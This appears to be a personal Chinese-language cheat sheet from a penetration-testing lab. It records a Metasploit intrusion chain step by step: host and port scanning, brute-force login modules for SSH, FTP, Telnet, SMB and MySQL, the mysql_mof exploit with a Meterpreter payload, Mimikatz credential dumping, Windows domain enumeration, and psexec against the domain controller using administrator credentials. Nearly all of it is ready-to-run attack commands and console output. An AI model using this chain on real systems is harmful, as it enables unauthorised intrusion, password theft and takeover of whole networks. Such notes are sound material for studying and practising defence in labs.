Msf:
寫的很亂 記錄下msf各個爆破弱口令的模塊
run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模塊 檢測在線主機
metasploit 增加路由
route add 10.10.1.3 255.255.255.0 1
使用掃描模塊
use scanner/portscan/tcp
爆破ssh
Msf>use auxiliary/scanner/ssh/ssh_login
爆破ftp
Msf>use auxiliary/scanner/ftp/ftp_login
爆破telnet
Msf>use auxiliary/scanner/telnet/telnet_login
爆破smb
auxiliary/scanner/smb/smb_login
爆破Mysql
use scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt
PASS_FILE => /root/passlist.txt
使用mof模塊進行權限獲取
use windows/mysql/mysql_mof
msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456
PASSWORD => 123456
msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3
rhost => 10.10.1.3
msf exploit(windows/mysql/mysql_mof) > set USERNAME root
USERNAME => root
msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/mysql/mysql_mof) > exploit
Mimikatz導出hash
meterpreter > load mimikatz
meterpreter > kerberos
一些域內的命令
查看域
net view /domain
查看當前域中的計算機
net view
查看CORP域中的計算機
net view /domain:CORP
Ping計算機名可以得到IP
ping Wangsong-PC
獲取所有域的用戶列表
net user /domain
獲取域用戶組信息
net group /domain
獲取當前域管理員信息
net group "domain admins" /domain
查看域時間及域服務器的名字
net time /domain
net time /domain 就可以知道域的計算機名
WIN-723O786H6KU.moonsec.com 10.10.1.2 這個就是域控
net group "domain admins" /domain
反彈shell
msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2
RHOST => 10.10.1.2
msf exploit(windows/smb/psexec) > set SMBDomain moonsec
SMBDomain => moonsec
msf exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass xxx123456..
SMBPass => xxx123456..
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > exploit